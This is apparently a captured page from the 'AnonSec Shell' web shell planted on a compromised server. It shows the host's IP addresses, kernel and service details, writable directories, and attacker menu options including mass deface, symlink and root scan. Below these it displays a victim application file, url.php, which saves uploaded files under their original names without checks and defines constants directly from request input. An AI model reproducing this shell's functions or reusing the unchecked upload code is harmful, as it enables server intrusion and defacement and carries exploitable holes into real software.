. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.32.98   [ Reverse IP ]
Web Server : Apache/2.4.66 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-81.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/ripara.co/app/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/ripara.co/app/url.php
<?php 

/**
 * Types of parameters: $_SERVER['QUERY_STRING'], $_POST and application/json
 */

$jsonRequest = getallheaders();

if ( array_key_exists('Content-Type', $jsonRequest) ) {
	$jsonRequest = strtolower(preg_replace('/\s+/', '', $jsonRequest["Content-Type"]));	
}


if($jsonRequest == "application/json;charset=utf-8"){
	$json = json_decode(file_get_contents('php://input', true));
	
	/* Uploaded image and video work!*/
	$files = array();
	foreach($json as $params) {

		$params = get_object_vars( $params );

		if(array_key_exists("value", $params)){
			//if the param have the value

			if($params["name"] === "upload" || $params["name"] === "uploadimg") {

				$data = $params['value'];

				list($type, $data) = explode(';', $data);
				list(, $data) = explode(',', $data);
				$data = base64_decode($data);
				
				if( preg_match("/jpeg/i", $type) ) {
					//add timestamp befor named of file image for preserve integrity
					$uploaddir = SITEROOT_DIR.'/www/api/tmp/'. time() . '_' .'temp.jpg';
				} else if ( preg_match("/png/i", $type) ) {
					$uploaddir = SITEROOT_DIR.'/www/api/tmp/'. time() . '_' .'temp.png';
				} else if ( preg_match("/gif/i", $type) ) {
					$uploaddir = SITEROOT_DIR.'/www/api/tmp/'. time() . '_' .'temp.gif';
				}
				//csv
				else if(preg_match("/csv/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/file.csv';
		        }  
				// videos
		        else if(preg_match("/flash/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.flv';
		        }  
		        else if(preg_match("/quicktime/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.mov';
		        }
		        else if(preg_match("/avi/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.avi';
		        }       
		        else if(preg_match("/mpeg/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.mp4';
		        } 
		        else if(preg_match("/mp4/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.mp4';
		        }                      
		        else if(preg_match("/asf/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.wmv';
		        }                                              
		        else if(preg_match("/flc/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.flc';
		        }                           
		        else if(preg_match("/ogg/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.ogg';
		        }                 
		        else if(preg_match("/asf/i", $type)){
		        	$uploaddir = SITEROOT_DIR.'/www/api/tmp/video.wmv';
		        }     
				
				file_put_contents($uploaddir, $data);
				$files[] = $uploaddir;

			} 

			
			
			if($params && $params["name"] != "upload" && $params["name"] != "uploadimg"){
				$key = strtoupper( $params['name'] );
				$value = $params['value'];

				if(is_array($value)){
					define($key, serialize($value));
				}else{
					define($key, $value);
				}	
			}
	
		}
	
	}
	
	
} else if($_SERVER['QUERY_STRING']){
	
	$params = explode("&", $_SERVER['QUERY_STRING']);

	if($_FILES) {
		$error = false;
		$files = array();
		$uploaddir = SITEROOT_DIR.'/www/api/tmp/';

		foreach($_FILES as $file) {
			if(move_uploaded_file($file['tmp_name'], $uploaddir .basename($file['name']))){
				$files[] = $uploaddir .$file['name'];
			} else {
				header('Content-Type: application/json');
				$data = array(
						"message" => "File non caricato! Errore! ". $uploaddir,
						"status" => false
					);
				print( json_encode($data) );
				die();
			}
		}

	}

	foreach($params as $param) {
	//	$param = strtolower($param);
		
		$tmparrparam=explode("=", $param);
		$value = end($tmparrparam );

		$retmparr = explode("=", strtoupper( $param ) );
		$key = reset($retmparr );
	
		define($key, $value);
	}
	
} else if($_POST) {
	
	if($_FILES) {
		$error = false;
		$files = array();
		$uploaddir = SITEROOT_DIR.'/www/api/tmp/';

		foreach($_FILES as $file) {
			if(move_uploaded_file($file['tmp_name'], $uploaddir .basename($file['name']))){
				$files[] = $uploaddir .$file['name'];
			} else {
				header('Content-Type: application/json');
				$data = array(
						"message" => "File non caricato! Errore! " . $uploaddir,
						"status" => false
					);
				print( json_encode($data) );
				die();
			}
		}

	}
	
	$params = $_POST;
	foreach($params as $k=>$v) {
		$key = strtoupper($k);
		$value = $v;
		define($key, $value);
	}
		
} else {
	header('Content-Type: application/json');
	$data = array(
			"message" => "Nessun Parametro Inviato!",
			"status" => false
		);
	print( json_encode($data) );

	die();
}


?>

Anon7 - 2022
AnonSec Team